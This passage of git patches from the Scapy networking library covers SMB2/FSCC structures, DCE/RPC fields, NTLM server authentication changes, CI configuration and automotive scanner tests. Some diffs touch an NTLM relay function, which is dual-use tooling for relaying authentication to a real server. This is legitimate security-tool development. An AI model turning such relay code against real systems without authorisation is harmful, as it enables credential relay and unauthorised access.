Command=0x0004 +) + +# sect 2.2.12 + + +class SMB2_Tree_Disconnect_Response(_SMB2_Payload): + name = "SMB2 TREE_DISCONNECT Response" + fields_desc = [ + XLEShortField("StructureSize", 0x4), + XLEShortField("Reserved", 0), + ] + + +bind_top_down( + SMB2_Header, + SMB2_Tree_Disconnect_Response, + Command=0x0004, + Flags=1 +) + + # sect 2.2.14.1 From d584858e2b8784906b5008a539cddecbd11063c7 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 29 Aug 2022 13:19:59 +0200 Subject: [PATCH 0876/1632] Minor bugfix SMB2 --- scapy/layers/smb2.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 4fd9352da21..8a8d3d1bdfd 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -235,7 +235,7 @@ def addfield(self, pkt, s, val): res = b"" for i, v in enumerate(val): x = self.i2m(pkt, v) - if v.Next is None and i != len(v) - 1: + if v.Next is None and i != len(val) - 1: x = struct.pack(" Date: Mon, 29 Aug 2022 15:48:22 +0200 Subject: [PATCH 0877/1632] Support more FSCC stuff --- scapy/layers/smb2.py | 85 +++++++++++++++++++++++++++++++++++++++ scapy/layers/smbserver.py | 5 +++ 2 files changed, 90 insertions(+) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 8a8d3d1bdfd..989d1d619ec 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -38,6 +38,7 @@ StrFixedLenField, StrLenFieldUtf16, StrLenField, + StrNullFieldUtf16, UTCTimeField, UUIDField, XLEIntField, @@ -169,6 +170,7 @@ 0x03: "FileBothDirectoryInformation", 0x05: "FileStandardInformation", 0x06: "FileInternalInformation", + 0x07: "FileEaInformation", 0x22: "FileNetworkOpenInformation", 0x25: "FileIdBothDirectoryInformation", 0x26: "FileIdFullDirectoryInformation", @@ -177,6 +179,14 @@ } +# [MS-FSCC] 2.4.12 FileEaInformation + +class FileEaInformation(Packet): + fields_desc = [ + LEIntField("EaSize", 0), + ] + + # [MS-FSCC] 2.4.29 FileNetworkOpenInformation @@ -267,6 +277,81 @@ class FileStandardInformation(Packet): ShortField("Reserved", 0), ] +# [MS-FSCC] 2.4.43 FileStreamInformation + + +class FileStreamInformation(Packet): + fields_desc = [ + LEIntField("Next", 0), + FieldLenField("StreamNameLength", None, length_of="StreamName", fmt=" Date: Mon, 29 Aug 2022 16:20:46 +0200 Subject: [PATCH 0878/1632] Handle lack of username --- scapy/layers/ntlm.py | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 6c79deb44a9..237b06842d6 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -857,8 +857,11 @@ def get_token(self, negoex=False): auth_tok, _, _, rawToken = self.token_pipe.recv() if NTLM_AUTHENTICATE_V2 not in auth_tok: raise ValueError("Unexpected state :(") - username = auth_tok.UserName if self.IDENTITIES: + if auth_tok.UserNameLen: + username = auth_tok.UserName + else: + username = None # We should know this user's KeyResponseNT. Check it if username in self.IDENTITIES: NTProofStr = auth_tok.NtChallengeResponse.computeNTProofStr( @@ -878,7 +881,10 @@ def get_token(self, negoex=False): def received_ntlm_token(self, ntlm_tuple): ntlm = ntlm_tuple[0] if isinstance(ntlm, NTLM_AUTHENTICATE_V2) and self.IDENTITIES: - username = ntlm.UserName + if ntlm.UserNameLen: + username = ntlm.UserName + else: + username = None if username in self.IDENTITIES: SessionBaseKey = NTLMv2_ComputeSessionBaseKey( self.IDENTITIES[username], From cd1b32618ec103a50553380299ee567acda57050 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 29 Aug 2022 18:48:40 +0200 Subject: [PATCH 0879/1632] Allow debug param --- scapy/layers/ntlm.py | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 237b06842d6..457e20ac303 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -928,7 +928,8 @@ def ntlm_relay(serverCls, ALLOW_SMB2=None, server_kwargs=None, client_kwargs=None, - iface=None): + iface=None, + debug=2): """ NTLM Relay @@ -976,7 +977,7 @@ def ntlm_relay(serverCls, while not evt.is_set(): clientsocket, address = ssock.accept() sock = StreamSocket(clientsocket, serverCls.cls) - srv_atmt = serverCls(sock, debug=4, **server_kwargs) + srv_atmt = serverCls(sock, debug=debug, **server_kwargs) # Connect to real server _sock = socket.socket() _sock.connect( @@ -995,7 +996,7 @@ def ntlm_relay(serverCls, remote_sock = StreamSocket(_sock, remoteClientCls.cls) print("%s connected -> %s" % (repr(address), repr(_sock.getsockname()))) - cli_atmt = remoteClientCls(remote_sock, debug=4, **client_kwargs) + cli_atmt = remoteClientCls(remote_sock, debug=debug, **client_kwargs) sock_tup = ((srv_atmt, cli_atmt), (sock, remote_sock)) sniffers.append(sock_tup) # Bind NTLM functions @@ -1023,7 +1024,8 @@ def ntlm_relay(serverCls, def ntlm_server(serverCls, server_kwargs=None, - iface=None): + iface=None, + debug=2): """ Starts a standalone NTLM server class """ @@ -1034,6 +1036,9 @@ def ntlm_server(serverCls, ssock.bind( (get_if_addr(iface or conf.iface), serverCls.port)) ssock.listen(5) + print(conf.color_theme.green( + "Server %s started. Waiting..." % serverCls.__name__ + )) sniffers = [] server_kwargs = server_kwargs or {} try: @@ -1041,9 +1046,9 @@ def ntlm_server(serverCls, while not evt.is_set(): clientsocket, address = ssock.accept() sock = StreamSocket(clientsocket, serverCls.cls) - srv_atmt = serverCls(sock, debug=4, **server_kwargs) + srv_atmt = serverCls(sock, debug=debug, **server_kwargs) sniffers.append((srv_atmt, sock)) - print("%s connected " % repr(address)) + print(conf.color_theme.gold("-> %s connected " % repr(address))) # Start automatons srv_atmt.runbg() except KeyboardInterrupt: From bb0e50c03e379276f412856b95c95e5123e37b62 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 2 Sep 2022 18:20:57 +0200 Subject: [PATCH 0880/1632] Minor DCE/RPC fixes (#3726) * Support enums on NDR64 * Add 2 FileFs formats * Minor improvements for conformant strings * Add DCE/RPC Fault * Fix NDRUnionField tag length computation * Allow overriding of SMB server auth * Add show2() to NDRPacket * NTLM: allow stub of BaseKey --- scapy/fields.py | 9 ++ scapy/layers/dcerpc.py | 155 +++++++++++++++++++++++++++-------- scapy/layers/ntlm.py | 50 +++++++---- scapy/layers/smb2.py | 48 +++++++++++ test/scapy/layers/dcerpc.uts | 5 ++ 5 files changed, 217 insertions(+), 50 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index e0e18a62516..b41aae16897 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1889,7 +1889,14 @@ def m2i(self, pkt, x): class StrLenField(StrField): + """ + StrField with a length + + :param length_from: a function that returns the size of the string + :param max_length: max size to use as randval + """ __slots__ = ["length_from", "max_length"] + ON_WIRE_SIZE_UTF16 = True def __init__( self, @@ -1906,6 +1913,8 @@ def __init__( def getfield(self, pkt, s): # type: (Any, bytes) -> Tuple[bytes, bytes] len_pkt = (self.length_from or (lambda x: 0))(pkt) + if not self.ON_WIRE_SIZE_UTF16: + len_pkt *= 2 return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) def randval(self): diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 72a9b695b17..a5ccc71b4ea 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -33,6 +33,7 @@ ByteEnumField, ByteField, ConditionalField, + EnumField, Field, FieldLenField, FieldListField, @@ -58,6 +59,7 @@ ShortEnumField, ShortField, SignedByteField, + StrField, StrFixedLenField, StrLenField, StrLenFieldUtf16, @@ -427,6 +429,29 @@ def is_encrypted(self): 0x80: "OBJECT_UUID", } +_DCE_RPC_ERROR_CODES = { + # Appendix E + 0x1C000008: "nca_rpc_version_mismatch", + 0x1C000009: "nca_unspec_reject", + 0x1C00000A: "nca_s_bad_actid", + 0x1C00000B: "nca_who_are_you_failed", + 0x1C00000C: "nca_manager_not_entered", + 0x1C010002: "nca_op_rng_error", + 0x1C010003: "nca_unk_if", + 0x1C010006: "nca_wrong_boot_time", + 0x1C010009: "nca_s_you_crashed", + 0x1C01000B: "nca_proto_error", + 0x1C010013: "nca_out_args_too_big", + 0x1C010014: "nca_server_too_busy", + 0x1C010017: "nca_unsupported_type", + 0x1C00001C: "nca_invalid_pres_context_id", + 0x1C00001D: "nca_unsupported_authn_level", + 0x1C00001F: "nca_invalid_checksum", + 0x1C000020: "nca_invalid_crc", + # [MS-ERREF] + 0x000006F7: "RPC_X_BAD_STUB_DATA", +} + class DceRpc5(Packet): """ @@ -754,6 +779,24 @@ class DceRpc5BindNak(_DceRpcPayload): bind_layers(DceRpc5, DceRpc5BindNak, ptype=13) +# sec 12.6.4.7 + + +class DceRpc5Fault(_DceRpcPayload): + name = "DCE/RPC v5 - Fault" + fields_desc = [ + _EField(IntField("alloc_hint", 0)), + _EField(ShortField("cont_id", 0)), + ByteField("cancel_count", 0), + ByteField("reserved", 0), + _EField(LEIntEnumField("status", 0, _DCE_RPC_ERROR_CODES)), + IntField("reserved2", 0), + ] + + +bind_layers(DceRpc5, DceRpc5Fault, ptype=3) + + # sec 12.6.4.9 @@ -838,6 +881,7 @@ def find_dcerpc_interface(name): # --- NDR fields - [C706] chap 14 + def _set_ndr_on(f, ndr64): if isinstance(f, _NDRPacket): f.ndr64 = ndr64 @@ -886,6 +930,11 @@ def copy(self): pkt.ndr64 = self.ndr64 return pkt + def show2(self, dump=False, indent=3, lvl="", label_lvl=""): + return self.__class__(bytes(self), ndr64=self.ndr64).show( + dump, indent, lvl, label_lvl + ) + def getfield_and_val(self, attr): try: return Packet.getfield_and_val(self, attr) @@ -1049,14 +1098,28 @@ def __init__(self, *args, **kwargs): # Enum types -class NDRShortEnumField(NDRAlign): +class _NDREnumField(EnumField): + # [MS-RPCE] sect 2.2.5.2 - Enums are 4 octets in NDR64 + FMTS = ["", "machineName", b"machinePassword") to + use for domain authentication, used to establish the netlogon + session. (UNIMPLEMENTED) """ port = 445 cls = conf.raw_layer @@ -768,7 +771,9 @@ def __init__(self, *args, **kwargs): self.cli_values = dict() self.ntlm_values = kwargs.pop("NTLM_VALUES", None) self.ntlm_state = 0 + self.DOMAIN_AUTH = kwargs.pop("DOMAIN_AUTH", None) self.IDENTITIES = kwargs.pop("IDENTITIES", None) + self.CHECK_LOGIN = bool(self.IDENTITIES) or bool(self.DOMAIN_AUTH) self.SigningSessionKey = None self.Challenge = None super(NTLM_Server, self).__init__(*args, **kwargs) @@ -857,19 +862,24 @@ def get_token(self, negoex=False): auth_tok, _, _, rawToken = self.token_pipe.recv() if NTLM_AUTHENTICATE_V2 not in auth_tok: raise ValueError("Unexpected state :(") - if self.IDENTITIES: + if self.CHECK_LOGIN: if auth_tok.UserNameLen: username = auth_tok.UserName else: username = None - # We should know this user's KeyResponseNT. Check it - if username in self.IDENTITIES: - NTProofStr = auth_tok.NtChallengeResponse.computeNTProofStr( - self.IDENTITIES[username], - self.Challenge.ServerChallenge, - ) - if NTProofStr == auth_tok.NtChallengeResponse.NTProofStr: + # Check the NTProofStr + if self.SigningSessionKey: + if self.DOMAIN_AUTH: + # Domain auth: if we have the session key, ntproofstr was ok return None, 0, None, rawToken # "success" + elif username in self.IDENTITIES: + # Local auth: We should know this user's KeyResponseNT + NTProofStr = auth_tok.NtChallengeResponse.computeNTProofStr( + self.IDENTITIES[username], + self.Challenge.ServerChallenge, + ) + if NTProofStr == auth_tok.NtChallengeResponse.NTProofStr: + return None, 0, None, rawToken # "success" # Bad NTProofStr or unknown user self.Challenge.ServerChallenge = struct.pack( " Date: Fri, 2 Sep 2022 16:39:31 +0100 Subject: [PATCH 0881/1632] Update unittests.yml Signed-off-by: sashashura <93376818+sashashura@users.noreply.github.com> --- .github/workflows/unittests.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 80ae99acaaf..988a56229f0 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -7,6 +7,9 @@ on: # The branches below must be a subset of the branches above branches: [master] +permissions: + contents: read + jobs: health: name: Code health check From 68f2b5d113fa87c4e52fe7d5f20c8f2fbfbb8dcd Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 2 Sep 2022 10:01:46 +0200 Subject: [PATCH 0882/1632] Disable isotp_log during unit-tests to reduce CI-load --- test/contrib/isotpscan.uts | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 1af5dcef0fa..4e0864835fa 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -121,7 +121,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock output_format="text", noise_listen_time=0.1, sniff_time=0.02, - verbose=True) + verbose=False) text = "\nFound 2 ISOTP-FlowControl Packet(s):" assert text in result @@ -148,7 +148,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602, padding=True), ISOTPS output_format="text", noise_listen_time=0.1, sniff_time=0.02, - verbose=True) + verbose=False) text = "\nFound 2 ISOTP-FlowControl Packet(s):" assert text in result @@ -176,7 +176,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x1ffff702, rx_id=0x1ffff602), ISOTPSoftS noise_listen_time=0.1, sniff_time=0.02, extended_can_id=True, - verbose=True) + verbose=False) text = "\nFound 2 ISOTP-FlowControl Packet(s):" assert text in result @@ -204,7 +204,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock noise_listen_time=0.1, sniff_time=0.02, can_interface="can0", - verbose=True) + verbose=False) s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, " \ "padding=False, basecls=ISOTP)\n" @@ -231,7 +231,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock noise_listen_time=0.1, sniff_time=0.02, can_interface="can0", - verbose=True) + verbose=False) s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, " \ "padding=False, basecls=ISOTP)\n" @@ -260,7 +260,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602, ext_address=0x11, rx_ extended_scan_range=range(0x20, 0x30), extended_addressing=True, can_interface="can0", - verbose=True) + verbose=False) s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, padding=False, " \ "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" @@ -289,7 +289,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x1ffff702, rx_id=0x1ffff602, ext_address extended_scan_range=range(0x20, 0x30), extended_addressing=True, can_interface="can0", - verbose=True) + verbose=False) s1 = "ISOTPSocket(can0, tx_id=0x1ffff602, rx_id=0x1ffff702, padding=False, " \ "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" @@ -316,7 +316,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock noise_listen_time=0.1, sniff_time=0.02, can_interface=new_can_socket0(), - verbose=True) + verbose=False) assert 0x602 == result[0].tx_id assert 0x702 == result[0].rx_id @@ -346,7 +346,7 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602, ext_address=0x11, rx_ extended_scan_range=range(0x20, 0x30), extended_addressing=True, can_interface=new_can_socket0(), - verbose=True) + verbose=False) assert 0x602 == result[0].tx_id assert 0x702 == result[0].rx_id From bb1ed01d469a2b155910f4b689cb1d0c7837225e Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 8 Sep 2022 21:26:25 +0200 Subject: [PATCH 0883/1632] Remove usage of cryptography's register_interface --- scapy/layers/tls/crypto/cipher_block.py | 5 +---- scapy/layers/tls/crypto/pkcs1.py | 4 +--- 2 files changed, 2 insertions(+), 7 deletions(-) diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index 55134da9eea..c4f73ced6a0 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -16,7 +16,6 @@ if conf.crypto_valid: from cryptography.utils import ( - register_interface, CryptographyDeprecationWarning, ) from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes, # noqa: E501 @@ -193,9 +192,7 @@ class Cipher_SEED_CBC(_BlockCipher): # silently not declared, and the corresponding suites will have 'usable' False. if conf.crypto_valid: - @register_interface(BlockCipherAlgorithm) - @register_interface(CipherAlgorithm) - class _ARC2(object): + class _ARC2(BlockCipherAlgorithm, CipherAlgorithm): name = "RC2" block_size = 64 key_sizes = frozenset([128]) diff --git a/scapy/layers/tls/crypto/pkcs1.py b/scapy/layers/tls/crypto/pkcs1.py index e5996590bd7..6691a56aa89 100644 --- a/scapy/layers/tls/crypto/pkcs1.py +++ b/scapy/layers/tls/crypto/pkcs1.py @@ -19,7 +19,6 @@ from scapy.config import conf, crypto_validator from scapy.error import warning if conf.crypto_valid: - from cryptography import utils from cryptography.exceptions import InvalidSignature, UnsupportedAlgorithm from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes @@ -96,8 +95,7 @@ def _legacy_pkcs1_v1_5_encode_md5_sha1(M, emLen): if conf.crypto_valid: # first, we add the "md5-sha1" hash from openssl to python-cryptography - @utils.register_interface(HashAlgorithm) - class MD5_SHA1(object): + class MD5_SHA1(HashAlgorithm): name = "md5-sha1" digest_size = 36 block_size = 64 From 7772f9adb916e147809bfd7110c27ac7d2a25e97 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 8 Sep 2022 21:26:39 +0200 Subject: [PATCH 0884/1632] Disable scanner tests in ./run_tests --- test/contrib/automotive/gm/scanner.uts | 1 + test/contrib/automotive/obd/scanner.uts | 2 +- test/contrib/automotive/scanner/uds_scanner.uts | 1 + test/contrib/isotpscan.uts | 1 + test/run_tests | 2 +- test/tools/isotpscanner.uts | 2 +- test/tools/obdscanner.uts | 2 +- test/tools/xcpscanner.uts | 1 + 8 files changed, 8 insertions(+), 4 deletions(-) diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index a4ff91e759d..5941e04b562 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -1,4 +1,5 @@ % Regression tests for GMLAN Scanners +~ scanner + Configuration ~ conf diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 407d5dee94b..ad90095b739 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -1,5 +1,5 @@ % Regression tests for obd_scan - +~ scanner + Configuration ~ conf diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 2fdb7f9acb0..89cd915b8f8 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -1,4 +1,5 @@ % Regression tests for Simulated ECUs and UDS Scanners +~ scanner + Configuration ~ conf diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 4e0864835fa..1c75e8cf936 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,4 +1,5 @@ % Regression tests for isotp_scan +~ scanner + Configuration ~ conf diff --git a/test/run_tests b/test/run_tests index ce743510b6a..7304855b0b6 100755 --- a/test/run_tests +++ b/test/run_tests @@ -54,7 +54,7 @@ then fi # Run tox - export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket -K automotive_comm -K imports" + export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket -K automotive_comm -K imports -K scanner" export SIMPLE_TESTS="true" PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") ${DIR}/.config/ci/test.sh $PYVER non_root diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 06776e12590..830c0515f41 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -1,5 +1,5 @@ % Regression tests for isotpscanner -~ vcan_socket needs_root linux not_pypy automotive_comm +~ vcan_socket needs_root linux not_pypy automotive_comm scanner + Configuration diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index ef21e9fba12..190855616e0 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -1,5 +1,5 @@ % Regression tests for obdscanner -~ vcan_socket needs_root linux not_pypy automotive_comm +~ vcan_socket needs_root linux not_pypy automotive_comm scanner + Configuration ~ conf diff --git a/test/tools/xcpscanner.uts b/test/tools/xcpscanner.uts index 190a1c0d075..bc393202342 100644 --- a/test/tools/xcpscanner.uts +++ b/test/tools/xcpscanner.uts @@ -1,4 +1,5 @@ % Regression tests for the XCP_CAN +~ scanner + Basic operations From cb5ca37cf124c4aa030ec2fac2fb788367c81efc Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 12 Sep 2022 16:53:44 +0200 Subject: [PATCH 0885/1632] Add unit tests for upstream cryptography --- test/configs/README.md | 5 +++++ test/configs/cryptography.utsc | 14 ++++++++++++++ test/tls.uts | 1 + 3 files changed, 20 insertions(+) create mode 100644 test/configs/README.md create mode 100644 test/configs/cryptography.utsc diff --git a/test/configs/README.md b/test/configs/README.md new file mode 100644 index 00000000000..99d85493c68 --- /dev/null +++ b/test/configs/README.md @@ -0,0 +1,5 @@ +### UTscapy configs + +- OS specifics: bsd, linux, solaris, windows +- Other: + - cryptography -> used for downstream testing by pyca/cryptography diff --git a/test/configs/cryptography.utsc b/test/configs/cryptography.utsc new file mode 100644 index 00000000000..8ce1fab976a --- /dev/null +++ b/test/configs/cryptography.utsc @@ -0,0 +1,14 @@ +{ + "testfiles": [ + "test/tls*.uts", + "test/scapy/layers/ipsec.uts" + ], + "breakfailed": true, + "onlyfailed": true, + "preexec": { + "test/tls*.uts": "load_layer(\"tls\")" + }, + "kw_ko": [ + "mock" + ] +} diff --git a/test/tls.uts b/test/tls.uts index 04dcda2ff39..abfa438d044 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1330,6 +1330,7 @@ assert not TLSHelloRequest().tls_session_update(None) = Cryptography module is unavailable +~ mock import scapy.libs.six as six import mock From 21669207862002e3e62fce015e16763a05638276 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 12 Sep 2022 17:14:26 +0200 Subject: [PATCH 0886/1632] Add upstream cryptography test --- .github/workflows/unittests.yml | 19 +++++++++++++++++++ test/configs/cryptography.utsc | 5 ++++- tox.ini | 9 +++++++++ 3 files changed, 32 insertions(+), 1 deletion(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 988a56229f0..c941a9f0094 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -118,6 +118,25 @@ jobs: with: file: /home/runner/work/scapy/scapy/.coverage + cryptography: + name: pyca/cryptography test + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v3 + - name: Setup Python + uses: actions/setup-python@v4 + with: + python-version: "3.10" + - name: Install tox + run: pip install tox + # pyca/cryptography's CI installs cryptography + # then runs the tests. We therefore didn't include it in tox + - name: Install cryptography + run: pip install cryptography + - name: Run tests + run: tox -e cryptography + # CODE-QL analyze: name: CodeQL analysis diff --git a/test/configs/cryptography.utsc b/test/configs/cryptography.utsc index 8ce1fab976a..debb353a173 100644 --- a/test/configs/cryptography.utsc +++ b/test/configs/cryptography.utsc @@ -1,11 +1,14 @@ { "testfiles": [ "test/tls*.uts", - "test/scapy/layers/ipsec.uts" + "test/scapy/layers/dot11.uts", + "test/scapy/layers/ipsec.uts", + "test/contrib/macsec.uts" ], "breakfailed": true, "onlyfailed": true, "preexec": { + "test/contrib/*.uts": "load_contrib(\"%name%\")", "test/tls*.uts": "load_layer(\"tls\")" }, "kw_ko": [ diff --git a/tox.ini b/tox.ini index 974e552951f..7bdc3a49786 100644 --- a/tox.ini +++ b/tox.ini @@ -62,6 +62,15 @@ commands = sudo -E {envpython} -m coverage run -m scapy.tools.UTscapy -c ./test/configs/linux.utsc {posargs} coverage combine +# Test used by upstream pyca/cryptography +[testenv:cryptography] +description = "Scapy unit tests - pyca/cryptography variant" +sitepackages = true +deps = +commands = + python -c "import cryptography; print('DEBUG: cryptography %s' % cryptography.__version__)" + python -m scapy.tools.UTscapy -c ./test/configs/cryptography.utsc + # Specific functions or tests [testenv:codecov] From fdfff8eb59b55d0533fc12aa0c38efb3bf1f6c10 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 20 Sep 2022 22:37:40 +0200 Subject: [PATCH 0887/1632] Change log level setting in isotp scan (#3741) --- scapy/contrib/isotp/isotp_scanner.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index b46eb384dd0..0ff7efa7737 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -136,9 +136,9 @@ def get_isotp_fc( isotp_pci = orb(packet.data[index]) >> 4 isotp_fc = orb(packet.data[index]) & 0x0f if isotp_pci == 3 and 0 <= isotp_fc <= 2: - log_isotp.debug("Found flow-control frame from identifier " - "0x%03x when testing identifier 0x%03x", - packet.identifier, id_value) + log_isotp.info("Found flow-control frame from identifier " + "0x%03x when testing identifier 0x%03x", + packet.identifier, id_value) if isinstance(id_list, dict): id_list[id_value] = (packet, packet.identifier) elif isinstance(id_list, list): From 799f272bc04c361841d01e9c0087950e0eb86610 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 21 Sep 2022 08:58:20 +0200 Subject: [PATCH 0888/1632] Improve reduce function for Automotive Scanner Enumerators (#3740) --- scapy/contrib/automotive/gm/gmlan_scanner.py | 2 +- .../contrib/automotive/scanner/enumerator.py | 17 ++++++++-------- scapy/contrib/automotive/uds_scan.py | 2 +- test/contrib/automotive/gm/scanner.uts | 12 +++++------ .../contrib/automotive/scanner/enumerator.uts | 20 +++++++++---------- .../automotive/scanner/uds_scanner.uts | 12 +++++------ 6 files changed, 32 insertions(+), 33 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index 30ddca5d9b6..3308f0a8608 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -314,7 +314,7 @@ def _get_table_entry_z(self, tup): def pre_execute(self, socket, state, global_configuration): # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 - if cast(ServiceEnumerator, self)._retry_pkt[state] is not None and \ + if cast(ServiceEnumerator, self)._retry_pkt[state] and \ not global_configuration.unittest: # this is a retry execute. Wait much longer than usual because # a required time delay not expired could have been received diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index c9ff95c7c74..37e97f194c8 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -115,8 +115,7 @@ def __init__(self): self._result_packets = OrderedDict() # type: Dict[bytes, Packet] self._results = list() # type: List[_AutomotiveTestCaseScanResult] self._request_iterators = dict() # type: Dict[EcuState, Iterable[Packet]] # noqa: E501 - self._retry_pkt = defaultdict( - lambda: None) # type: Dict[EcuState, Optional[Union[Packet, Iterable[Packet]]]] # noqa: E501 + self._retry_pkt = defaultdict(list) # type: Dict[EcuState, Union[Packet, Iterable[Packet]]] # noqa: E501 self._negative_response_blacklist = [0x10, 0x11] # type: List[int] self._requests_per_state_estimated = None # type: Optional[int] @@ -173,12 +172,14 @@ def _get_initial_requests(self, **kwargs): def __reduce__(self): # type: ignore f, t, d = super(ServiceEnumerator, self).__reduce__() # type: ignore try: - del d["_request_iterators"] + for k, v in six.iteritems(d["_request_iterators"]): + d["_request_iterators"][k] = list(v) except KeyError: pass try: - del d["_retry_pkt"] + for k in d["_retry_pkt"]: + d["_retry_pkt"][k] = list(self._get_retry_iterator(k)) except KeyError: pass return f, t, d @@ -214,9 +215,7 @@ def _store_result(self, state, req, res): def _get_retry_iterator(self, state): # type: (EcuState) -> Iterable[Packet] retry_entry = self._retry_pkt[state] - if retry_entry is None: - return [] - elif isinstance(retry_entry, Packet): + if isinstance(retry_entry, Packet): log_automotive.debug("Provide retry packet") return [retry_entry] else: @@ -376,7 +375,7 @@ def _evaluate_response(self, return True # cleanup retry packet - self._retry_pkt[state] = None + self._retry_pkt[state] = [] return self._evaluate_ecu_state_modifications(state, request, response) @@ -435,7 +434,7 @@ def _populate_retry(self, current execution was already a retry execution. """ - if self._retry_pkt[state] is None: + if not self._get_retry_iterator(state): # This was no retry since the retry_pkt is None self._retry_pkt[state] = request log_automotive.debug( diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 6fc6fb7b31a..d597c6af1a8 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -544,7 +544,7 @@ def 